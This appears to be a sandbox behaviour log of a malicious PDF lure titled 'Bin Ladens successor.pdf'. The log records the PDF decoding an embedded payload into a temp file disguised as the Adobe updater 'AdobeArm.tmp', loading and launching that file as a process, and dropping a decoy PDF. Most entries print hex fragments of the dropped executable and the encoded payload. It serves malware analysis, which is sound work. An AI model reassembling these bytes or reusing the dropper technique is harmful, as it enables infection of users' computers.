File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: FF FF 59 59 8D 85 64 EA FF FF 8D 4D E4 50 68 00 00 40 04 FF 75 0C FF 75 08 E8 A9 0C 00 00 85 C0 0F 84 5D 01 00 00 8D 45 E0 53 50 8D 45 F0 50 68 05 00 00 20 FF 75 EC C7 45 E0 04 00 00 00 FF 15 70 71 00 10 85 C0 0F 84 37 01 00 00 8B 45 F0 40 50 E8 2A 28 00 00 8B F8 59 3B FB 0F 84 22 01 00 00 8B 45 F0	success or wait	2081538449
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 66 34 41 9F 97 E6 EF ED ED 7A 32 87 10 02 42 ED 07 66 62 12 02 41 9F 97 E6 EF ED ED 7A 0A 81 10 02 42 ED 07 66 62 12 02 44 9F 97 E6 EF ED ED 41 42 FA 2A 36 12 12 9F 97 E6 EF ED ED 42 78 10 ED 27 1A 83 10 02 45 FA 28 E9 ED ED 91 D6 0E 97 D2 66 5E 9F 97 E6 EF ED ED 97 D2 67 16 21 E4 F9 24 9F 97 E6 EF	success or wait	2081538549
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 74 26 53 8D 85 F4 FD FF FF 68 20 95 02 10 50 FF 15 74 70 00 10 53 8D 85 F4 FD FF FF 68 18 93 02 10 50 FF 15 74 70 00 10 56 8D 85 F4 FD FF FF 53 50 E8 38 24 00 00 8D 85 F4 FD FF FF 50 6A 02 FF 35 08 91 02 10 57 E8 3A FB FF FF 83 C4 1C 85 C0 74 4C 8D 85 F4 FD FF FF 85 C0 75 04 33 F6 EB 36 8D 85 F4 FD	success or wait	2081540074
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 96 B7 B7 B7 7A 82 82 12 02 42 B7 FA AE 32 12 12 91 D6 0A 2B 4F E2 D4 57 EE 10 9B 4F FE AD 11 52 12 92 67 14 45 FA 68 30 12 12 99 67 E2 9F 5F FE 43 9F 5F DA 99 14 41 43 41 44 ED 42 2E 29 D1 6F 1E 7A 8A 82 12 02 44 42 FA 77 30 12 12 2B 4F FE 67 14 45 FA 5E 30 12 12 99 57 FE 9F 47 AA 41 40 99 1A 78 13	success or wait	2081540178
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 84 A5 A5 A5 68 90 90 00 10 50 A5 E8 BC 20 00 00 83 C4 18 39 5D F0 C6 45 FC 02 89 5D EC BF 03 40 00 80 75 06 57 E8 7A 22 00 00 8B 75 F0 8D 4D EC 51 8D 4D C8 8B 06 53 51 53 56 FF 50 3C 3B C3 7D 0C 68 98 90 00 10 56 50 E8 65 22 00 00 39 5D EC 75 06 57 E8 4C 22 00 00 8B 45 EC 8D 55 B8 53 52 8B 08 6A 01	success or wait	2081541307
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 9F 97 9E EF ED ED 44 42 FA 51 0F 12 12 9A 0A 99 57 1A 4B 99 12 4B 29 57 1E 67 30 2B 4F 02 66 1E 9F 97 9E EF ED ED 42 ED 67 02 ED C5 2B 4F 06 66 1E 9F 97 9E E9 ED ED 42 ED 67 06 ED C5 ED 57 EE 99 57 EE 29 57 EA 1D 90 24 ED ED ED ED 67 E6 ED 07 0A 58 10 02 ED 67 E2 F9 13 45 ED 07 6A 62 12 02 4D 4C 49	success or wait	2081541462
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 8D 85 8C FD FF FF 56 50 E8 43 1D 00 00 88 18 8B 45 08 59 8B 00 59 3B 45 0C 75 22 39 5D 10 74 0C 8D 85 8C FD FF FF 50 FF 75 10 FF D7 39 5D 14 74 0C 8D 85 8C FB FF FF 50 FF 75 14 FF D7 FF 45 FC 8B 45 FC 3B 45 F8 0F 82 36 FF FF FF FF 75 F4 FF 15 18 4A 02 10 FF 75 F0 EB 01 57 FF 15 78 70 00 10 5F 5E 5B	success or wait	2081542607
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 9F 97 AE EF ED ED 78 ED 42 44 44 ED 07 5E 62 12 02 99 57 E6 42 9F 97 AE E1 ED ED 42 ED 07 A2 62 12 02 9F 97 AE E5 ED ED 42 ED 07 AE 62 12 02 9F 56 12 13 99 2F 72 63 12 02 42 9F 97 AE E5 ED ED 42 99 57 EA 78 39 ED 62 1A ED C5 9F 97 AE E1 ED ED 42 ED 07 AE 62 12 02 9F 56 12 13 42 9F 97 AE E1 ED ED 42	success or wait	2081542733
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 8D 85 BC FD FF FF 6A FF 50 56 56 FF 15 4C 70 00 10 8B 45 F4 50 8D 85 BC F3 FF FF 50 FF 15 B0 70 00 10 8D 85 BC F7 FF FF 50 FF 15 BC 70 00 10 8D 44 00 01 8B 3D 60 71 00 10 50 8D 85 BC F7 FF FF 50 8B 45 F8 6A 2B FF 70 08 FF D7 8D 85 BC F3 FF FF 50 FF 15 BC 70 00 10 8D 44 00 01 50 8D 85 BC F3 FF FF 50	success or wait	2081543906
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 91 D2 11 36 EE FA 94 06 12 12 99 D6 45 9B 57 E6 42 74 9B 22 9F 97 AE EF ED ED 78 ED 42 44 44 ED 07 5E 62 12 02 99 57 E6 42 9F 97 AE E1 ED ED 42 ED 07 A2 62 12 02 9F 97 AE E5 ED ED 42 ED 07 AE 62 12 02 9F 56 12 13 99 2F 72 63 12 02 42 9F 97 AE E5 ED ED 42 99 57 EA 78 39 ED 62 1A ED C5 9F 97 AE E1 ED	success or wait	2081544005
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 83 C0 03 24 FC E8 86 14 00 00 8B C4 57 89 45 F4 50 66 89 30 8D 85 BC FD FF FF 6A FF 50 56 56 FF 15 4C 70 00 10 8B 45 F4 50 8D 85 BC F3 FF FF 50 FF 15 B0 70 00 10 8D 85 BC F7 FF FF 50 FF 15 BC 70 00 10 8D 44 00 01 8B 3D 60 71 00 10 50 8D 85 BC F7 FF FF 50 8B 45 F8 6A 2B FF 70 08 FF D7 8D 85 BC F3 FF	success or wait	2081545087
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 13 12 12 12 49 4B 4B D1 47 99 FE 43 91 2F 5E 9C 10 02 12 41 44 45 99 E3 67 17 FA 2B EF ED ED 99 57 1E 9F 5A 0D 99 57 1A D3 FB 17 9B 1C 99 02 9B 44 16 99 42 16 9B 44 1A 99 42 1A 9B 44 1E 99 42 1E 91 FB 16 9B 44 02 1D 96 7B 13 12 12 5B 5B 1D 96 CD 12 12 12 5B 5B 1D 97 D1 13 12 12 99 5A 02 AD 36 48 10	success or wait	2081545187
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 01 00 00 00 5B 59 59 C3 55 8B EC 51 83 3D 4C 8E 02 10 00 53 56 57 8B F1 75 05 E8 39 FD FF FF 8B 45 0C 8D 48 1F 8B 45 08 C1 E9 05 89 0E 8B 10 89 56 04 8B 50 04 89 56 08 8B 50 08 89 56 0C 8B 50 0C 83 E9 04 89 56 10 0F 84 69 01 00 00 49 49 0F 84 DF 00 00 00 49 49 0F 85 C3 01 00 00 8B 48 10 BF 24 5A 02	success or wait	2081546266
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: DB D3 F8 1A 21 26 9F 36 40 10 02 21 4A EA 1D A4 D8 99 C1 21 26 9F 36 5C 10 02 1D A4 5F EA D3 F8 02 21 26 9F 36 58 10 02 1D A4 C0 21 62 EE 99 DC 9B 67 FA D3 FB 0A 99 1E 9F 36 44 10 02 21 1E 87 36 40 10 02 99 47 F2 D3 F8 1A 1D A4 C0 21 1E 87 36 5C 10 02 1D A4 47 CE 21 1E 87 36 58 10 02 21 1A 99 C3 99	success or wait	2081546405
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: C9 C1 EA 08 33 34 8D 24 52 02 10 33 58 F8 0F B6 CA 8B D3 33 34 8D 24 4E 02 10 0F B6 4D F8 C1 EA 10 33 34 8D 24 4A 02 10 0F B6 D2 33 70 FC 8B CE 89 75 E8 C1 E9 18 8B 0C 8D 24 56 02 10 33 0C 95 24 52 02 10 8B 55 E0 C1 EA 08 0F B6 D2 33 0C 95 24 4E 02 10 0F B6 55 DC 33 0C 95 24 4A 02 10 33 08 8B D1 8B	success or wait	2081547492
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: C3 D3 F8 02 21 62 EE 1D A4 C0 99 EC 9B 67 FA D3 FD 0A 99 2E AF 36 44 10 02 21 2E 87 36 40 10 02 99 47 F2 D3 F8 1A 1D A4 C0 21 2E 87 36 5C 10 02 1D A4 C1 21 2E 87 36 58 10 02 99 C4 D3 F8 02 21 2A 9B 6F FE 1D A4 E8 99 C3 99 2E AF 36 40 10 02 D3 F8 1A 1D A4 C0 21 2E 87 36 5C 10 02 99 C1 D3 F8 0A D3 F9	success or wait	2081547592
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: D1 C1 EA 10 33 70 FC 0F B6 D2 8B FE 89 75 E8 C1 EF 18 8B 3C BD 24 56 02 10 33 3C 95 24 52 02 10 8B 55 E0 C1 EA 08 0F B6 D2 33 3C 95 24 4E 02 10 0F B6 D3 33 3C 95 24 4A 02 10 8B D6 C1 EA 10 33 38 89 7D EC 0F B6 FA 8B D1 8B 3C BD 24 52 02 10 C1 EA 08 0F B6 D2 33 3C 95 24 4E 02 10 8B D3 C1 EA 18 C1 EB	success or wait	2081548678
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 9B 6F FE 99 2E 9F 36 40 10 02 99 5F CE 21 2E 8F 36 5C 10 02 D3 FB 0A 21 2E 9F 36 44 10 02 1D A4 5F F2 21 2E 9F 36 58 10 02 21 6A 16 9B 6F E2 99 DC 99 67 F2 D3 FB 1A 1D A4 DB D3 FC 0A 99 0E 9F 36 5C 10 02 99 5F CE 21 0E A7 36 44 10 02 91 D2 02 D3 FB 02 1D A4 DB 21 0E 9F 36 40 10 02 1D A4 D8 D3 F8 0A	success or wait	2081548778
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 89 7D EC 8B 3C 8D 24 52 02 10 8B 4D DC 33 3C 9D 24 4E 02 10 C1 E9 18 33 3C 8D 24 56 02 10 0F B6 4D E0 33 3C 8D 24 4A 02 10 33 78 04 89 7D F0 8B CE 8B 75 E0 C1 E9 08 0F B6 C9 C1 EE 18 8B 1C 8D 24 4E 02 10 8B 4D DC 33 1C B5 24 56 02 10 83 C0 10 C1 E9 10 0F B6 C9 33 1C 8D 24 52 02 10 0F B6 CA C1 EA 18	success or wait	2081549867
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: FB 02 1D A4 DB 21 2E 9F 5E 61 10 02 1D A4 D9 D3 F9 0A 21 2E 9F 5E 79 10 02 99 5F F2 99 0E 8F 5E 65 10 02 D3 FB 02 1D A4 DB 21 6A 1A 21 0E 9F 5E 61 10 02 99 5F CE D3 FB 1A 1D A4 DB 21 0E 9F 5E 7D 10 02 1D A4 D8 21 0E 9F 5E 79 10 02 99 5F E2 21 4A 1E 99 57 1E 9B 6A 1A 9B 22 4D 9B 4A 1E 4C 9B 5A 16 49	success or wait	2081549967
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: E9 10 0F B6 C9 33 3C 8D 4C 73 02 10 0F B6 CB C1 EB 18 33 3C 8D 4C 6B 02 10 8B 4D E0 8B 1C 9D 4C 77 02 10 C1 E9 10 0F B6 C9 33 78 08 33 1C 8D 4C 73 02 10 8B 4D DC C1 E9 08 0F B6 C9 33 1C 8D 4C 6F 02 10 0F B6 CA 33 1C 8D 4C 6B 02 10 8B 4D F0 33 58 0C 8B 45 0C 89 78 08 89 30 5F 89 58 0C 5E 89 48 04 5B	success or wait	2081551039
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 12 02 ED 37 DE 62 12 02 ED 37 D6 62 12 02 44 99 E3 FA 08 12 12 12 E4 56 36 1A 13 66 15 44 FA A7 EE ED ED 4B 99 D4 4C D0 16 12 ED 37 06 63 12 02 ED 37 0E 63 12 02 DE DE 9F 5F F6 FB 41 F2 ED ED AA 42 60 12 02 FB F2 EE ED ED DE DE 9F 5F F2 FB 2D F2 ED ED AA 6A 60 12 02 FB DE EE ED ED DE DE 9F 5F E2 FB	success or wait	2081551175
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 00 10 FF 25 CC 70 00 10 FF 25 C4 70 00 10 56 8B F1 E8 1A 00 00 00 F6 44 24 08 01 74 07 56 E8 B5 FC FF FF 59 8B C6 5E C2 04 00 FF 25 14 71 00 10 FF 25 1C 71 00 10 CC CC 8D 4D E4 E9 53 E0 FF FF B8 50 72 00 10 E9 E0 FC FF FF CC CC 8D 4D E0 E9 3F E0 FF FF B8 78 72 00 10 E9 CC FC FF FF CC CC 8D 4D F0 E9	success or wait	2081552225
Section loaded	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Access: query and write and read and execute and extend size Type: image Baseaddress: 4FE0000 Size: 65536 Protection: execute and read and write Mapped to pid: own pid	success or wait	2081577439
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: 5FD0000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	2081612748
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid	success or wait	2081615201
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 25980000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	2081620570
Section loaded	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Access: query and read Type: commit Baseaddress: 4FF0000 Size: 49152 Protection: readonly Mapped to pid: own pid	success or wait	2084254054
Process created	PID: 4076 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Cmdline: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Createflags: 0	success or wait	2084256875
File created	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	2086065222
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: 25 50 44 46 2D 31 2E 34 0D 25 E2 E3 CF D3 0D 0A 31 35 20 30 20 6F 62 6A 20 3C 3C 2F 4C 69 6E 65 61 72 69 7A 65 64 20 31 2F 4C 20 34 31 36 37 33 2F 4F 20 31 38 2F 45 20 33 33 31 39 34 2F 4E 20 34 2F 54 20 34 31 33 32 36 2F 48 20 5B 20 36 37 36 20 32 30 37 5D 3E 3E 0D 65 6E 64 6F 62 6A 0D 20 20 20 20	success or wait	2086075087
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: 65 64 69 61 42 6F 78 5B 30 20 30 20 35 39 35 20 38 34 32 5D 2F 43 72 6F 70 42 6F 78 5B 30 20 30 20 35 39 35 20 38 34 32 5D 2F 52 65 73 6F 75 72 63 65 73 20 31 39 20 30 20 52 3E 3E 0D 65 6E 64 6F 62 6A 0D 31 39 20 30 20 6F 62 6A 3C 3C 2F 46 6F 6E 74 3C 3C 2F 54 54 31 20 32 30 20 30 20 52 2F 54 54 32	success or wait	2086079717
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: 54 79 70 65 2F 46 6F 6E 74 44 65 73 63 72 69 70 74 6F 72 20 32 36 20 30 20 52 2F 57 69 64 74 68 73 5B 32 35 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 32 35 30 20 33 33 33 20 32 35 30 20 32 37 38 20 35 30 30 20 35 30 30 20 35 30 30 20 30 20 30 20 35 30 30 20 35 30 30 20	success or wait	2086082915
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: 46 6C 61 67 73 20 33 34 2F 53 74 65 6D 56 20 38 32 2F 43 61 70 48 65 69 67 68 74 20 36 35 36 2F 58 48 65 69 67 68 74 20 30 2F 41 73 63 65 6E 74 20 38 39 31 2F 44 65 73 63 65 6E 74 20 2D 32 31 36 2F 49 74 61 6C 69 63 41 6E 67 6C 65 20 30 2F 46 6F 6E 74 46 61 6D 69 6C 79 28 54 69 6D 65 73 20 4E 65 77	success or wait	2086086543
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: B6 7C 99 9F 17 44 05 4D E1 95 C8 AB 50 EB 43 5C 8B E8 4A F5 E4 E8 3F 23 71 F0 41 5E 64 67 FA 35 94 E9 DA 43 77 C0 B1 3B 7D 8E 8B 9C 55 E8 70 EF 35 03 B1 9E 6B DE 94 A2 BA 09 8D 67 4B FC 69 4A C8 27 2E 28 AB E1 EA 07 BB 75 28 59 A4 DB 49 74 36 3F 94 D3 0C 4C 91 BE 30 03 61 08 A8 1E A2 E7 A3 DE 92 43	success or wait	2086100254
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: 88 25 25 CE 9E 4E 12 EF 4F 90 23 E3 B6 BA A2 9A 90 2C 33 14 C8 2A 01 6C A1 88 2D 88 A1 BA 33 F9 6C 54 03 2E 94 C9 F2 64 E5 35 B1 82 30 66 4C 1C 37 2A 8A 8D AA 62 A7 61 AA 12 59 CE 8F C3 8C 17 B1 51 3D 48 91 09 CA 64 8D 19 81 EA CE 16 88 B8 E1 5C 16 53 C4 E5 C5 A0 4B A0 9E CC 8D 27 6B CD BA FD B8 D1	success or wait	2086112743
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: 7A B8 90 71 D9 C5 22 EF 4A 62 C5 64 97 EF 59 53 51 8A DB 90 93 7E C9 4E AD 81 BF D5 1B 72 BA 41 AA BB 5A 46 6A E4 2C 92 6D 50 7C EB BF 44 52 E5 77 24 71 10 40 DB 19 18 2D A0 19 34 91 1A 49 0D D3 69 FF 0E 46 91 50 68 C9 62 4E E3 A7 35 8D 9F EC 88 FF 40 A0 DC B5 BF 44 A0 DD A7 04 CA BE 72 46 02 FF A1	success or wait	2086117527
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: 40 DA C3 AB FD 52 80 2A 75 3A F0 35 BC D0 7C 2E BF BF C1 64 12 77 E4 89 81 51 71 21 7C 37 DB DA E5 CE 29 BA E8 80 D2 6B 75 D9 98 BD C3 BE C3 19 DE 43 5E 49 40 9B B3 62 55 BB 5C C4 6B 65 B6 0C 59 67 3E E7 5E D9 37 2F F8 11 C3 19 EA 88 06 33 19 2C 5E 9B 9F D9 B6 84 21 39 B2 E3 A5 91 A2 46 2B FF B1 34	success or wait	2086122293
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: 8C F4 1A 27 2A 35 AD F6 79 89 EE 57 03 81 91 4E 7F 3F 12 EB 4B 53 81 94 31 5D C6 C6 B0 BE E4 4E C3 F8 53 4D 76 4D F1 CE 37 62 AD 7E D7 66 1D 93 EA 30 37 B7 B2 36 48 71 DF 97 5A 16 AC CE 1C C9 C3 E9 D5 4C D7 73 23 8D C0 39 A6 3D E1 F4 D1 F2 BE 4B F4 FB 3D FA 18 EC C5 7A 8D 23 9C 57 F4 AE DF 9B 73 BC	success or wait	2086126528
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: EE 66 37 59 52 96 87 7C D1 2D E5 2E 87 5D 93 26 21 84 97 3C 62 58 B3 0F 12 02 36 8F C5 DE 1B 1E EE 66 F3 A4 8D 8D 0F C2 2B 68 20 6A C2 E5 51 28 86 0A 42 40 2D A1 88 85 B3 C1 C2 46 45 90 F2 B2 8A A0 16 6D AB ED 47 BF 8F AF 1F 54 D1 56 3E 5B 2A 92 ED 9C 73 77 37 9B 7C C0 5F BD CF 99 DF CC 99 33 67 66	success or wait	2086130073
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: AF 61 26 0F C1 61 08 73 FC 4E B2 5B E1 07 A3 78 77 1C E9 81 D7 E1 0D AC 90 B7 E0 18 76 9A E3 78 C6 90 23 88 1D 8D A2 27 38 A6 F1 C7 E1 77 C8 33 2D 8D 3B 05 A7 B1 43 FD 1E DE 85 F7 E0 1C 9C 44 EE 7D FE 3C 83 DC 79 F8 10 3E 82 4F 84 54 A4 3E 80 2B F8 BC 89 37 38 67 56 3D BC 70 C1 FC 79 15 8A 3C D7 57	success or wait	2086141654
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: 83 55 D0 4A 51 C7 4C 4A E1 48 C4 27 DB CE 5A AF 2A 36 2C B5 F9 78 57 C8 34 39 13 7B BF C1 3E 0B F5 66 B2 DB 8F F0 4C DA 12 0C 30 3F 60 AE CC C6 1A ED 45 41 05 CB 36 66 10 55 8A 68 32 5A 48 8E 5A 40 0D 2F 1F C3 CA 11 07 05 31 37 98 40 3E BE 05 19 DA A2 50 25 93 4D 2A D7 2B BC 9C 2D 14 0A C9 34 4C BB	success or wait	2086144987
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: E9 63 F3 A0 07 E7 6A 30 FE C9 F3 0F 22 42 9C 24 4E 3C 8E 07 D5 65 44 A8 D5 DD 83 EF 3A 22 90 CC FA FE 43 F7 E0 7D D6 93 67 FD B8 85 A4 90 5A 5F D7 77 44 36 22 D2 3C 86 31 9D 91 6B B8 27 35 21 B2 0B 0F 21 DB 27 E0 C6 B1 58 21 0B B0 48 56 B3 56 5B 30 4D FC 0D E5 22 D5 8D 09 E2 18 66 18 27 30 44 EC E6	success or wait	2086147639
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: 0F 21 32 C8 7E 92 04 26 61 67 47 98 6B 95 41 9C 68 FF E6 2A B0 99 AC 15 AB F8 4C AB 90 23 36 61 2E 59 2D 26 73 5F 9D CC 7C 12 0E 93 D2 FF 75 1E E7 7A 81 AC 21 D5 A4 4A 1D C6 52 35 91 FD 40 10 4B C8 44 E3 24 B6 C9 31 D8 66 D2 93 4C 7A 53 E0 53 42 DF 08 4C F0 A2 75 00 87 1C F8 FF B3 C6 FC 0E 1E 35 5B	success or wait	2086151287
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: CE 58 C6 58 CA 58 C2 58 CC 58 C4 58 C8 58 C0 98 CF 98 C7 98 CB 98 C3 98 CD 98 C5 98 C9 98 C1 98 CE 98 C6 98 CA 98 C2 98 CC 98 C4 98 C8 98 C0 18 CF 18 C7 18 CB 18 C3 18 CD F8 97 F1 0F E3 6F C6 5F 8C 51 8C 3F 19 23 19 1C 7B 14 C7 1E C5 B1 47 71 EC 51 1C 7B 14 C7 1E C5 B1 47 71 EC 51 1C 7B 14 C7 1E C5	success or wait	2086174862
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: 94 07 E5 74 B0 FC FF 5D 95 C5 AE 8C B6 36 11 4A 83 52 DA 9A FC 47 A3 24 70 6A 6B 55 A1 84 B6 36 16 8A 6B 6B 53 A1 18 9E 15 05 45 B4 35 AF 50 18 6F 16 D2 D6 E4 DF 58 41 6D 4D FE 6F B3 00 C8 8F CF F3 E1 57 C8 0B F2 E0 B2 DC 20 17 2E CB 09 72 80 EC 20 9B B6 26 FF 5B CA 0A B2 E0 CE CC B8 33 13 2E CB 88	success or wait	2086178217
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: DE 86 AC CE 2C 2D 90 D5 10 6C 0D 64 95 55 B6 2A 5D 0C 11 25 6E 0E BA 83 B5 07 C5 5B DC AA 1F 65 4A A9 4C 25 B2 67 AA A7 DB EF 6F 3B E2 50 5D 6D 93 8E B5 83 93 B2 7B 72 51 B7 B9 0F AC 1B 98 B4 ED 9E 54 BD 03 83 7D 53 22 B7 F4 4F 89 16 EC 99 CC 6D 5B 37 30 3B BE 69 62 42 15 35 B5 4D 16 75 F7 DD AD EF	success or wait	2086181545
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: 9A F7 28 F4 7A 67 EF 35 DD A1 52 9B 34 A5 A5 A5 A5 A5 A5 A5 A5 A5 A5 A5 A5 A5 A5 A5 A5 A5 BD D8 94 53 DD C5 5E 57 E6 16 B6 F6 66 6D 57 67 18 89 9A DD AA 65 28 55 EB CA 29 7B 52 75 06 F5 DE 54 6D A3 3E 90 AA ED 6A A7 DC 6B DE 25 63 0E 33 85 5A 7D AA D6 94 53 EB 4E D5 3A F3 A1 54 9D 41 BD 33 55 DB A8	success or wait	2086187269
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: 0A 48 89 C4 55 09 50 53 D7 1A 3E 37 09 5B 20 2C 06 10 09 60 88 C8 BE 9C CB 22 A0 11 41 50 D4 02 2A 01 E1 29 02 21 06 12 59 92 26 61 A7 48 22 B2 48 2D 56 04 04 17 52 C0 05 A4 A0 22 2A 45 40 2A 6A 61 40 8B F2 1C 90 2A B6 F0 C0 05 05 71 A1 D4 11 DE 0D 4B 4B 7D F3 9E 9D 37 F3 E6 9D 33 77 CE FC DF 7F FE	success or wait	2086190664
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: 48 9C CF 02 AF 08 55 65 A0 9A 8C 8B 80 29 40 1E CB 10 B3 35 08 58 65 96 2F 81 8B E7 EB 1B 4F 56 F1 63 B8 61 85 E6 64 85 5A 39 D8 7D A4 0A BC 58 0C 36 45 4E 3E 0B FC DE 43 0F CD 4E 2C B2 28 68 96 54 21 F7 F5 BC 3A CF ED 0F 8C E9 57 34 2B 0B FE A1 3D 8F 3C 4C F0 25 8D 7A 9A D8 00 A7 73 83 6D 79 3E C5	success or wait	2086194365
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: 5C F4 E3 4A CB 66 95 BA 40 E3 96 F5 C3 44 17 A7 02 CB 0A 53 E7 33 23 1B F7 AE 1D 48 57 6B 28 8E F2 67 56 49 52 BE 09 B5 8A F7 7A 5A 74 71 D7 AA E2 2D 7A A8 A2 91 66 49 C5 F0 D7 16 3A 43 AB 8F B0 34 43 03 E5 D8 25 FA 8E BE 99 13 A7 47 0F E3 6E 52 EE 35 FB AF AB CD 4E 6B 5E 39 E2 77 D8 A7 FA C3 E9 A4	success or wait	2086197827
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: A0 42 30 09 30 00 86 80 27 60 0B A8 02 CA 20 E3 86 F0 D9 F0 1D 1A 20 CB 57 81 45 0D C2 A1 DB 96 73 B9 81 31 BB A1 57 B3 D4 65 77 C7 19 19 D1 CF 88 28 85 30 5B F5 17 74 19 4B 36 D8 86 03 F0 65 39 2D E5 A7 C5 33 BB 2F 74 0C D5 19 1B 66 16 73 3F 69 19 9D 4E 5E 32 2E D1 BA AA 29 32 92 B5 AB CF F7 F9 02	success or wait	2086201230
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf Offset: none Length: 1024 Value: 26 E4 A1 06 92 09 A3 20 C7 D7 84 BA 07 86 A2 85 43 EB 0C BD B4 9E 66 37 97 9E 1E 8E 62 A2 61 D8 7C 85 0A 86 80 86 FE AD C4 88 DA 06 6E AD E5 04 85 BF 35 44 A0 A0 73 DB 02 9B EF 37 F8 FD 91 62 00 52 49 56 F2 70 89 86 FF DD 59 2C 88 DF D2 84 09 65 0B 9E 4C 96 0D 44 43 39 DC 06 38 0D 38 41 D9 DC 0D BA	success or wait	2086203570
